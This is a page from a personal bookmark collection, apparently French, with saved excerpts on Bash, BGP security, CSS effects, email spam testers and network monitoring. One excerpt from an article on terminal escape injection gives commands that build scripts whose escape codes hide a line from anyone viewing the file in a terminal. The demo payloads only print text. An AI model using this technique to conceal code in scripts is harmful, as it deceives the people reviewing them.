Links32
Tag cloud
Picture wall
Daily
RSS Feed
  • RSS Feed
  • Daily Feed
  • Weekly Feed
  • Monthly Feed
Filters

Links per page

  • 20 links
  • 50 links
  • 100 links

Filters

Untagged links
page 13 / 80
The Bash Hackers Wiki [Bash Hackers Wiki] https://wiki.bash-hackers.org/start
Mon Apr 20 17:41:15 2020 archive.org

The Bash Hackers Wiki

wiki hacker shell help bash terminal
Is BGP safe yet? · Cloudflare https://isbgpsafeyet.com/
Mon Apr 20 10:21:28 2020 archive.org
thumbnail

Is BGP safe yet? No.

Border Gateway Protocol (BGP) is the postal service of the Internet. It’s responsible for looking at all of the available paths that data could travel and picking the best route.

Unfortunately, it isn’t secure, and there have been some major Internet disruptions as a result. But fortunately there is a way to make it secure.

ISPs and other major Internet players (Comcast, Sprint, Verizon, and others) would need to implement a certification system, called RPKI.

bgp test secu isp
‎Apple Music https://music.apple.com/fr/browse
Fri Apr 17 16:14:15 2020 archive.org
thumbnail

apple music

apple music
Breaking Bad Typo Generator | https://breakingbad.echosystem.fr https://breakingbad.echosystem.fr/
Fri Apr 17 15:29:39 2020 archive.org

https://breakingbad.echosystem.fr/breaking-bad.png

breaking bad logo

  • BREAKING BAD GeneratoR -

https://breakingbad.echosystem.fr/

breakingbad tool font
Your IP info https://ip.echosystem.fr/
Fri Apr 17 15:29:10 2020 archive.org

Your IP info

https://ip.echosystem.fr/Info/image.php

ip info
hls.js demo https://hls-js.netlify.app/demo/
Fri Apr 17 14:40:54 2020 archive.org

demo v0.13.2
API docs | usage guide

Test your HLS streams in all supported browsers (Chrome/Firefox/IE11/Edge/Safari).

Advanced controls are available at the bottom of this page.

api doc stream
Terminal Escape Injection - InfosecMatter https://www.infosecmatter.com/terminal-escape-injection/
Fri Apr 17 14:38:02 2020 archive.org
thumbnail

Shell script escape injection

  echo -e '#!/bin/sh\n\necho "evil!"\nexit 0\n\033[2Aecho "Hello World!"\n' > script.sh
 chmod a+x script.sh

The resulting script.sh will then work on (has been tested on):

 Linux (gnome-terminal, xterm, aterm)
 Mac OS (Terminal 2.0, iTerm2)
 Cygwin (Windows)

Python script escape injection

     echo -e '#!/usr/bin/python\n\nprint "evil!";\nexit(0);\n#\033[2A\033[1Dprint "Hello World!";\n' > script.py
   chmod a+x script.py

The resulting script.py will then work on (has been tested on):

Linux (gnome-terminal, xterm, aterm)
Mac OS (Terminal 2.0, iTerm2)
Cygwin (Windows)

Batch (Command Prompt) escape injection

     echo -e '@echo off\n\r\n\recho evil!\r\n::\033[2D  \033[A\033[2Decho Hello World!' > script.bat

The resulting script.bat will then work on (has been tested on):

Windows 10 PowerShell
Windows 10 Command Prompt

PS1 (PowerShell) escape injection

      echo -e 'write-host "evil!"\r\n#\033[A\033[2Dwrite-host "Hello World!"' > script.ps1

The resulting script.ps1 will then work on (has been tested on):

Windows 10 PowerShell
Windows 10 Command Prompt

Conclusion

As we have seen in this article, terminal escape injections affect practically every modern operating system environment and they can be really nasty.

As infosec professionals, we should know about them and keep our guards up when it matters. Hopefully this article provided enough information to stay safe.

Please feel free to let us know in the comment section your thoughts.

secu injection terminal shell
Hubble Birthday https://imagine.gsfc.nasa.gov/hst_bday/
Thu Apr 16 15:09:25 2020 archive.org

Select Your Birth Date

nasa birhtday space univers
CREUSTEL (@creustel) • Photos et vidéos Instagram https://www.instagram.com/creustel/
Tue Apr 14 23:01:19 2020 archive.org

CREUSTEL
🦠 Plus belle la vie de confiné ! 😷
📺 Doublages et bêtises pour passer le temps.
👫 Ecrit et doublé par @marioncreusvaux.insta et @julienpestel.

instagram creustel fun
Script Hook V - AB Software Development http://www.dev-c.com/gtav/scripthookv/
Tue Apr 14 18:23:43 2020 archive.org

GAME = GTAV

Download http://www.dev-c.com/files/ScriptHookV_1.0.1868.1.zip

lastest version for GTAV

GTAV GTA script-hook
Invidious - alternative Youtube https://www.invidio.us/
Sun Apr 12 03:17:29 2020 archive.org

Invidious
Popular
Trending
Subscriptions
Playlists

youtube youtube-alternative invidio.us
bash:tip_colors_and_formatting - FLOZz' MISC https://misc.flogisoft.com/bash/tip_colors_and_formatting
Fri Apr 10 16:41:54 2020 archive.org

Bash tips: Colors and formatting (ANSI/VT100 Control sequences)

The ANSI/VT100 terminals and terminal emulators are not just able to display black and white text ; they can display colors and formatted texts thanks to escape sequences.

Those sequences are composed of the Escape character (often represented by “^[” or “<Esc>”) followed by some other characters: “<Esc>[FormatCodem”.

In Bash, the <Esc> character can be obtained with the following syntaxes:

\e
\033
\x1B

Examples:
Code (Bash) Preview

    echo -e "\e[31mHello World\e[0m"

Hello World

    echo -e "\033[31mHello\e[0m World"

Hello World

NOTE¹: The -e option of the echo command enable the parsing of the escape sequences.

NOTE²: The “\e[0m” sequence removes all attributes (formatting and colors). It can be a good idea to add it at the end of each colored text. ;)

NOTE³: The examples in this page are in Bash but the ANSI/VT100 escape sequences can be used in every programming languages.

bash tips formatage color
Spam Testing Tools - GlockApps https://spam-check.glockapps.com/
Thu Apr 9 09:11:20 2020 archive.org

From the full report you will find out:

What specific ISP's are delivering your email to the inbox.
How your sender IP/domain reputation affects the delivery of your email.
Whether the content of your email affects the delivery of your email.
How fast your email is being delivered.

If your business relies heavily on email marketing, a small bump in inbox delivery rate can result in significant increase in sales.

GlockApps tests show how your emails perform per email provider. They also show how sender reputation and email content affect Inbox placement. You get a valuable insight and actionable tips to get top notch email deliverability.

mail check span
Newsletters spam test by mail-tester.com https://www.mail-tester.com/
Tue Apr 7 19:17:08 2020 archive.org
thumbnail

Testez l'indésirabilité (spam) de vos emails

mail check
Hover.css - A collection of CSS3 powered hover effects http://ianlunn.github.io/Hover/
Mon Apr 6 15:39:11 2020 archive.org
thumbnail

Hover.css v2

Effects Setup Tutorial Licenses 

A collection of CSS3 powered hover effects to be applied to links, buttons, logos, SVG, featured images and so on. Easily apply to your own elements, modify or just use for inspiration. Available in CSS, Sass, and LESS.

css dev web hover
Hovereffects.css http://kevinjannis.github.io/hovereffects.css/
Mon Apr 6 15:38:17 2020 archive.org
css dev
Fresnel Major – Sean Augustine March https://sean-augustine-march.myshopify.com/products/fresnel-large
Mon Apr 6 13:00:24 2020 archive.org
thumbnail

Fresnel Major

Dichroic borosilicate glass
10" x 10" x 10.5" 
White wood base, 15' cord, 5 watt LED rated 200,000+ hour lifespan
Lead time 3-5 weeks
Ships domestic and international
The belle of the cube
Fresnel Major 3d light optic
Observium https://docs.observium.org/
Thu Apr 2 14:52:35 2020 archive.org

Observium is an auto-discovering network monitoring platform supporting a wide range of hardware platforms and operating systems including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, F5, Brocade, Citrix Netscaler, NetApp and many more. Observium seeks to provide a powerful yet simple and intuitive interface to the health and status of your network.

Observium auto-discovering network monitoring platform
82 CSS Text Effects https://freefrontend.com/css-text-effects/
Thu Apr 2 13:42:30 2020 archive.org

82 CSS Text Effects

Collection of free HTML and CSS text effect code examples. Update of June 2018 collection. 23 new items.

css effect
OVH COMMUNITY - Status - OVH https://www.ovh.com/world/community/status/
Mon Mar 30 17:59:36 2020 archive.org

OVH # STATUS

OVH provides real-time service status updates

https://www.ovh.com/world/community/status/

https://travaux.ovh.net/?project=0&status=all&perpage=50

https://twitter.com/ovh_status?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor!

ovh status check
page 13 / 80
1590 links, including 7 private
Shaarli - The personal, minimalist, super-fast, database free, bookmarking service by the Shaarli community - Theme by kalvn